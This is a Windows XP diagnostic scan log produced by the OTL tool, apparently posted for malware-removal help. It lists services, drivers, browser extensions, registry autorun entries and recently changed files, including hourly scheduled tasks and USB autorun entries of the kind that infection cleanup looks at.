    PRC - [2006/12/23 19:05:20 | 000,143,360 | ---- | M] (Nero AG) -- C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
    PRC - [2006/12/23 19:04:42 | 000,905,216 | ---- | M] (Nero AG) -- C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
    PRC - [2004/08/04 23:00:00 | 001,032,192 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe


    ========== Modules (SafeList) ==========

    MOD - [2010/11/06 08:31:08 | 000,575,488 | ---- | M] (OldTimer Tools) -- C:\FIX THIS PC\BBS\OTL\OTL.exe
    MOD - [2010/08/24 03:12:02 | 001,054,208 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
    MOD - [2007/09/02 13:57:36 | 000,069,632 | ---- | M] () -- C:\Program Files\RocketDock\RocketDock.dll


    ========== Win32 Services (SafeList) ==========

    SRV - [2010/11/29 17:42:16 | 000,363,344 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)
    SRV - [2010/10/28 21:13:30 | 000,293,456 | ---- | M] (Logitech, Inc.) [On_Demand | Stopped] -- C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe -- (LBTServ)
    SRV - [2010/10/16 00:40:40 | 000,037,664 | ---- | M] (Apple Inc.) [Auto | Running] -- C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe -- (Apple Mobile Device)
    SRV - [2010/09/12 12:14:21 | 000,655,624 | ---- | M] (Acresso Software Inc.) [On_Demand | Stopped] -- C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -- (FLEXnet Licensing Service)
    SRV - [2010/05/20 18:19:16 | 000,088,176 | ---- | M] (McAfee, Inc.) [Auto | Running] -- c:\Program Files\McAfee\SiteAdvisor\McSACore.exe -- (McAfee SiteAdvisor Service)
    SRV - [2010/03/18 17:47:22 | 000,035,160 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe -- (aspnet_state)
    SRV - [2010/03/18 14:16:28 | 000,753,504 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe -- (WPFFontCache_v0400)
    SRV - [2010/03/18 14:16:28 | 000,130,384 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
    SRV - [2010/03/18 14:16:28 | 000,124,240 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe -- (NetTcpPortSharing)


    ========== Driver Services (SafeList) ==========

    DRV - [2010/11/30 17:06:04 | 006,261,352 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\RtkHDAud.sys -- (IntcAzAudAddService) Service for Realtek HD Audio (WDM)
    DRV - [2010/11/29 17:42:06 | 000,020,952 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\WINDOWS\system32\drivers\mbam.sys -- (MBAMProtector)
    DRV - [2010/10/17 05:55:00 | 009,623,680 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\nv4_mini.sys -- (nv)
    DRV - [2010/09/08 07:08:58 | 000,100,712 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\nvhda32.sys -- (NVHDA)
    DRV - [2010/08/25 04:31:18 | 000,028,624 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LUsbFilt.sys -- (LUsbFilt)
    DRV - [2010/08/25 04:31:02 | 000,037,328 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LMouFilt.Sys -- (LMouFilt)
    DRV - [2010/08/25 04:30:52 | 000,038,864 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LHidFilt.Sys -- (LHidFilt)
    DRV - [2010/08/25 04:30:18 | 000,010,448 | ---- | M] (Logitech, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\LBeepKE.sys -- (LBeepKE)
    DRV - [2010/07/25 11:51:42 | 000,691,696 | ---- | M] (Duplex Secure Ltd.) [Kernel | Boot | Stopped] -- C:\WINDOWS\System32\Drivers\sptd.sys -- (sptd)
    DRV - [2010/07/14 15:58:07 | 000,016,512 | ---- | M] (Windows (R) 2000 DDK provider) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\gdrv.sys -- (gdrv)
    DRV - [2009/11/18 07:17:00 | 001,395,800 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Monfilt.sys -- (Monfilt)
    DRV - [2009/11/18 07:16:00 | 001,691,480 | ---- | M] (Creative) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Ambfilt.sys -- (Ambfilt)
    DRV - [2009/06/18 03:56:24 | 000,079,248 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\LMouKE.Sys -- (LMouKE)
    DRV - [2009/06/18 03:55:26 | 000,063,248 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\L8042mou.Sys -- (L8042mou)
    DRV - [2009/06/18 03:55:18 | 000,020,240 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\L8042Kbd.sys -- (L8042Kbd)
    DRV - [2008/04/14 23:00:00 | 000,144,384 | ---- | M] (Windows (R) Server 2003 DDK provider) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\hdaudbus.sys -- (HDAudBus)
    DRV - [2008/01/15 22:50:52 | 000,459,520 | ---- | M] (Ralink Technology, Corp.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Dr71WU.sys -- (RT73)
    DRV - [2007/09/20 19:07:40 | 000,022,016 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\nvnetbus.sys -- (nvnetbus)
    DRV - [2007/09/20 19:07:38 | 000,053,632 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\NVENETFD.sys -- (NVENETFD)
    DRV - [2004/08/03 23:07:56 | 000,059,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\usbaudio.sys -- (usbaudio) USB Audio Driver (WDM)


    ========== Standard Registry (SafeList) ==========


    ========== Internet Explorer ==========

    IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm

    IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
    IE - HKCU\..\URLSearchHook: {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
    IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
    IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

    ========== FireFox ==========

    FF - prefs.js..browser.search.useDBForOrder: true
    FF - prefs.js..browser.startup.homepage: "http://www.houstontexans.com/news/calendar.html"
    FF - prefs.js..extensions.enabledItems: jqs@sun.com:1.0
    FF - prefs.js..extensions.enabledItems: {B7082FAA-CB62-4872-9106-E42DD88EDE45}:3.2
    FF - prefs.js..extensions.enabledItems: {DDC359D1-844A-42a7-9AA1-88A850A938A8}:1.1.10
    FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}:6.0.21
    FF - prefs.js..extensions.enabledItems: {bee6eb20-01e0-ebd1-da83-080329fb9a3a}:0.1
    FF - prefs.js..extensions.enabledItems: {AE93811A-5C9A-4d34-8462-F7B864FC4696}:3.76
    FF - prefs.js..extensions.enabledItems: {340c2bbc-ce74-4362-90b5-7c26312808ef}:1.5.1
    FF - prefs.js..extensions.enabledItems: {B17C1C5A-04B1-11DB-9804-B622A1EF5492}:1.2.1
    FF - prefs.js..extensions.enabledItems: {AB2CE124-6272-4b12-94A9-7303C7397BD1}:5.0.0.6778


    FF - HKLM\software\mozilla\Firefox\extensions\\{B7082FAA-CB62-4872-9106-E42DD88EDE45}: C:\Program Files\McAfee\SiteAdvisor [2010/12/02 14:54:38 | 000,000,000 | ---D | M]
    FF - HKLM\software\mozilla\Mozilla Firefox 3.6.12\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2010/10/29 15:57:41 | 000,000,000 | ---D | M]
    FF - HKLM\software\mozilla\Mozilla Firefox 3.6.12\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2010/11/20 23:46:27 | 000,000,000 | ---D | M]

    [2010/07/14 18:18:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Extensions
    [2010/11/29 16:16:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions
    [2010/07/31 20:20:41 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}
    [2010/11/10 18:29:58 | 000,000,000 | ---D | M] (Firefox Sync) -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions\{340c2bbc-ce74-4362-90b5-7c26312808ef}
    [2010/11/08 16:54:07 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}
    [2010/10/21 22:51:25 | 000,000,000 | ---D | M] (Password Exporter) -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions\{B17C1C5A-04B1-11DB-9804-B622A1EF5492}
    [2010/08/16 18:58:26 | 000,000,000 | ---D | M] (Flash and Video Download) -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions\{bee6eb20-01e0-ebd1-da83-080329fb9a3a}
    [2010/07/14 19:18:19 | 000,000,000 | ---D | M] (DownThemAll!) -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}
    [2010/08/21 14:31:06 | 000,005,475 | ---- | M] () -- C:\Documents and Settings\Marshall\Application Data\Mozilla\Firefox\Profiles\gga8nyz2.default\searchplugins\googlecom-in-english.xml
    [2010/11/29 16:16:06 | 000,000,000 | ---D | M] -- C:\Program Files\Mozilla Firefox\extensions
    [2010/11/09 16:01:15 | 000,000,000 | ---D | M] (Skype extension) -- C:\Program Files\Mozilla Firefox\extensions\{AB2CE124-6272-4b12-94A9-7303C7397BD1}
    [2010/07/30 19:49:16 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}
    [2010/07/17 06:00:04 | 000,423,656 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Mozilla Firefox\plugins\npdeployJava1.dll
    [2007/03/10 10:16:44 | 000,189,496 | ---- | M] (Yahoo! Inc.) -- C:\Program Files\Mozilla Firefox\plugins\npyaxmpb.dll
    [2009/12/24 14:15:24 | 000,000,614 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\image.xml

    O1 HOSTS File: ([2010/08/18 22:34:06 | 000,000,764 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
    O1 - Hosts: 127.0.0.1 localhost
    O1 - Hosts: 127.0.0.1 activate.adobe.com
    O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - No CLSID value found.
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found.
    O2 - BHO: (Skype Plug-In) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
    O2 - BHO: (McAfee SiteAdvisor BHO) - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
    O3 - HKLM\..\Toolbar: (McAfee SiteAdvisor Toolbar) - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
    O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {472734EA-242A-422B-ADF8-83D1E48CC825} - No CLSID value found.
    O4 - HKLM..\Run: [AdobeCS4ServiceManager] C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe (Adobe Systems Incorporated)
    O4 - HKLM..\Run: [EvtMgr6] C:\Program Files\Logitech\SetPointP\SetPoint.exe (Logitech, Inc.)
    O4 - HKLM..\Run: [LifeChat] C:\Program Files\Microsoft LifeChat\LifeChat.exe (Microsoft Corporation)
    O4 - HKLM..\Run: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe (Malwarebytes Corporation)
    O4 - HKLM..\Run: [NvCplDaemon] C:\WINDOWS\System32\NvCpl.DLL (NVIDIA Corporation)
    O4 - HKLM..\Run: [NvMediaCenter] C:\WINDOWS\System32\NvMcTray.DLL (NVIDIA Corporation)
    O4 - HKLM..\Run: [nwiz] C:\Program Files\NVIDIA Corporation\nView\nwiz.exe ()
    O4 - HKLM..\Run: [WindowsLivePhone] C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe (Microsoft Corporation)
    O4 - HKCU..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe (Nero AG)
    O4 - HKCU..\Run: [RocketDock] C:\Program Files\RocketDock\RocketDock.exe ()
    O4 - HKCU..\Run: [WindowsLivePhone] C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe (Microsoft Corporation)
    O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Infodelivery present
    O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
    O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 255
    O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoAutorun = 1
    O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
    O9 - Extra Button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
    O9 - Extra 'Tools' menuitem : Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
    O10 - NameSpace_Catalog5\Catalog_Entries\000000000004 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
    O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} C:\Program Files\Yahoo!\Common\Yinsthelper.dll (Reg Error: Key error.)
    O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
    O16 - DPF: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
    O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
    O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)
    O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 211.31.138.11 211.29.132.12 198.142.0.51
    O18 - Protocol\Handler\dssrequest {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
    O18 - Protocol\Handler\sacore {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
    O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
    O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
    O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
    O20 - Winlogon\Notify\LBTWlgn: DllName - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll - c:\Program Files\Common Files\Logishrd\Bluetooth\LBTWLgn.dll (Logitech, Inc.)
    O24 - Desktop WallPaper: C:\Documents and Settings\Marshall\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
    O24 - Desktop BackupWallPaper: C:\Documents and Settings\Marshall\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
    O32 - HKLM CDRom: AutoRun - 1
    O32 - AutoRun File - [2010/07/14 12:18:14 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
    O32 - AutoRun File - [2009/04/29 20:02:01 | 000,000,055 | R--- | M] () - E:\autorun.inf -- [ CDFS ]
    O33 - MountPoints2\{45c44cdc-d34a-11df-a483-001fd0d8baba}\Shell\AutoRun\command - " " = C:\WINDOWS\System32\rundll.exe -- File not found
    O33 - MountPoints2\{45c44cdc-d34a-11df-a483-001fd0d8baba}\Shell\explore\command - " " = C:\WINDOWS\System32\rundll.exe -- File not found
    O33 - MountPoints2\{45c44cdc-d34a-11df-a483-001fd0d8baba}\Shell\open\command - " " = C:\WINDOWS\System32\rundll.exe -- File not found
    O33 - MountPoints2\{7de735f2-e597-11df-a4b0-001fd0d8baba}\Shell - " " = AutoRun
    O33 - MountPoints2\{7de735f2-e597-11df-a4b0-001fd0d8baba}\Shell\Auto\command - " " = G:\Automatic.sos -- File not found
    O33 - MountPoints2\{7de735f2-e597-11df-a4b0-001fd0d8baba}\Shell\AutoRun - " " = Auto&Play
    O33 - MountPoints2\{c0c47043-8f27-11df-a589-806d6172696f}\Shell - " " = AutoRun
    O33 - MountPoints2\{c0c47043-8f27-11df-a589-806d6172696f}\Shell\AutoRun - " " = Auto&Play
    O33 - MountPoints2\{c0c47043-8f27-11df-a589-806d6172696f}\Shell\AutoRun\command - " " = E:\BlueBirds.exe -- [2009/04/29 20:02:01 | 000,270,336 | R--- | M] (LG Electronics)
    O34 - HKLM BootExecute: (autocheck autochk *) - File not found
    O35 - HKLM\..comfile [open] -- "%1" %*
    O35 - HKLM\..exefile [open] -- "%1" %*
    O37 - HKLM\...com [@ = comfile] -- "%1" %*
    O37 - HKLM\...exe [@ = exefile] -- "%1" %*

    NetSvcs: 6to4 - File not found
    NetSvcs: Ias - File not found
    NetSvcs: Iprip - File not found
    NetSvcs: Irmon - File not found
    NetSvcs: NWCWorkstation - File not found
    NetSvcs: Nwsapagent - File not found
    NetSvcs: WmdmPmSp - File not found

    CREATERESTOREPOINT
    Restore point Set: OTL Restore Point (16620634377289728)

    ========== Files/Folders - Created Within 30 Days ==========

    [2010/12/06 09:45:07 | 000,000,000 | ---D | C] -- C:\Program Files\ESET
    [2010/12/06 07:12:48 | 000,000,000 | ---D | C] -- C:\WINDOWS\LastGood
    [2010/12/05 13:52:33 | 000,000,000 | ---D | C] -- C:\Program Files\MSXML 6.0
    [2010/12/05 11:44:28 | 000,000,000 | ---D | C] -- C:\WINDOWS\ServicePackFiles
    [2010/12/05 10:45:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files
    [2010/12/05 10:44:36 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\CatRoot_bak
    [2010/12/04 20:27:05 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Marshall\Recent
    [2010/12/04 19:54:09 | 000,000,000 | ---D | C] -- C:\FIX THIS PC
    [2010/12/04 19:49:45 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\My Documents\HELPZ
    [2010/12/04 19:23:35 | 000,000,000 | ---D | C] -- C:\Program Files\Temp File Cleaner
    [2010/12/04 18:58:36 | 000,000,000 | ---D | C] -- C:\Program Files\HiJackThis
    [2010/12/04 17:26:42 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\MFAData
    [2010/12/04 17:18:56 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\PC Tools
    [2010/12/04 17:01:15 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\My Documents\REG Backups
    [2010/12/04 16:50:09 | 000,000,000 | ---D | C] -- C:\Documents and Settings\NetworkService\Local Settings\Application Data\Adobe
    [2010/12/04 16:50:09 | 000,000,000 | ---D | C] -- C:\Documents and Settings\NetworkService\Application Data\Adobe
    [2010/12/04 16:31:42 | 000,000,000 | ---D | C] -- C:\Riot Games
    [2010/12/04 16:31:29 | 000,000,000 | ---D | C] -- C:\Program Files\Riot Games
    [2010/12/04 16:04:25 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Local Settings\Application Data\PMB Files
    [2010/12/04 16:04:18 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\PMB Files
    [2010/12/04 16:03:17 | 000,000,000 | ---D | C] -- C:\Program Files\Pando Networks
    [2010/12/04 15:31:15 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft LifeChat
    [2010/12/04 15:11:58 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Desktop
    [2010/12/04 15:11:53 | 000,000,000 | ---D | C] -- C:\Program Files\IObit
    [2010/12/04 14:57:23 | 000,000,000 | ---D | C] -- C:\Program Files\iPod
    [2010/12/04 14:57:18 | 000,000,000 | ---D | C] -- C:\Program Files\iTunes
    [2010/12/04 14:56:45 | 000,000,000 | ---D | C] -- C:\Program Files\Bonjour
    [2010/12/04 14:35:16 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Local Settings\Application Data\Logishrd
    [2010/12/04 14:34:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documents\LogiShrd
    [2010/12/04 14:34:25 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Logishrd
    [2010/12/04 14:34:24 | 000,000,000 | ---D | C] -- C:\Program Files\Logitech
    [2010/12/04 14:30:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Application Data\Logishrd
    [2010/12/04 14:05:16 | 000,000,000 | ---D | C] -- C:\Documents and Settings\NetworkService\Application Data\Macromedia
    [2010/12/04 14:04:18 | 000,000,000 | ---D | C] -- C:\f187b0792ef2605282a8
    [2010/12/04 13:58:54 | 000,000,000 | ---D | C] -- C:\MISC Stuff
    [2010/12/01 14:42:24 | 000,000,000 | ---D | C] -- C:\WINDOWS\Prefetch
    [2010/12/01 14:37:43 | 000,079,872 | ---- | C] (Ricoh Co., Ltd.) -- C:\WINDOWS\System32\dllcache\rwia330.dll
    [2010/12/01 14:37:43 | 000,079,872 | ---- | C] (Ricoh Co., Ltd.) -- C:\WINDOWS\System32\dllcache\rwia001.dll
    [2010/12/01 14:37:43 | 000,026,624 | ---- | C] (Ricoh Co., Ltd.) -- C:\WINDOWS\System32\dllcache\rw330ext.dll
    [2010/12/01 14:36:43 | 000,054,528 | ---- | C] (Philips Semiconductors GmbH) -- C:\WINDOWS\System32\dllcache\cap7146.sys
    [2010/11/27 13:10:57 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Application Data\TuneUp Software
    [2010/11/27 13:09:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\TuneUp Software
    [2010/11/27 13:07:11 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\All Users\Application Data\{24036256-BFDB-4CD3-BE8A-A3D6160F2E16}
    [2010/11/23 07:37:04 | 000,000,000 | ---D | C] -- C:\Documents and Settings\LocalService\Local Settings\Application Data\Apple
    [2010/11/14 14:38:22 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{0151C9FC-719D-4459-B1E2-4685CC6E62A8}
    [2010/11/12 18:44:53 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Marshall\Application Data\SecuROM
    [2010/11/12 18:15:11 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Marshall\Local Settings\Application Data\{0691F710-1ECA-4B5A-9727-25554F1BFDC6}
    [2010/11/12 17:29:43 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Local Settings\Application Data\Downloaded Installations
    [2010/11/12 16:41:33 | 000,000,000 | ---D | C] -- C:\Program Files\Electronic Arts
    [2010/11/09 16:03:28 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Local Settings\Application Data\Threat Expert
    [2010/11/09 16:02:04 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Application Data\skypePM
    [2010/11/09 16:00:21 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Skype
    [2010/11/09 16:00:20 | 000,000,000 | R--D | C] -- C:\Program Files\Skype
    [2010/11/09 16:00:19 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Marshall\Application Data\Skype
    [2010/11/09 16:00:11 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Skype
    [9 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
    [3 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]

    ========== Files - Modified Within 30 Days ==========

    [2010/12/06 12:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At6.job
    [2010/12/06 11:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At2.job
    [2010/12/06 10:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At10.job
    [2010/12/06 09:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At12.job
    [2010/12/06 08:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At19.job
    [2010/12/06 07:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At24.job
    [2010/12/06 06:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At15.job
    [2010/12/06 05:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At21.job
    [2010/12/06 04:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At1.job
    [2010/12/06 03:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At9.job
    [2010/12/06 02:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At7.job
    [2010/12/06 01:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At18.job
    [2010/12/06 00:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At17.job
    [2010/12/05 23:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At20.job
    [2010/12/05 22:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At14.job
    [2010/12/05 21:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At16.job
    [2010/12/05 20:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At22.job
    [2010/12/05 19:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At4.job
    [2010/12/05 18:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At8.job
    [2010/12/05 17:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At3.job
    [2010/12/05 16:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At13.job
    [2010/12/05 15:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At23.job
    [2010/12/05 14:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At11.job
    [2010/12/05 14:50:31 | 000,495,848 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
    [2010/12/05 14:50:31 | 000,084,310 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
    [2010/12/05 14:46:24 | 000,013,646 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
    [2010/12/05 14:46:14 | 000,000,284 | ---- | M] () -- C:\WINDOWS\tasks\RealUpgradeLogonTaskS-1-5-21-1202660629-1500820517-682003330-1003.job
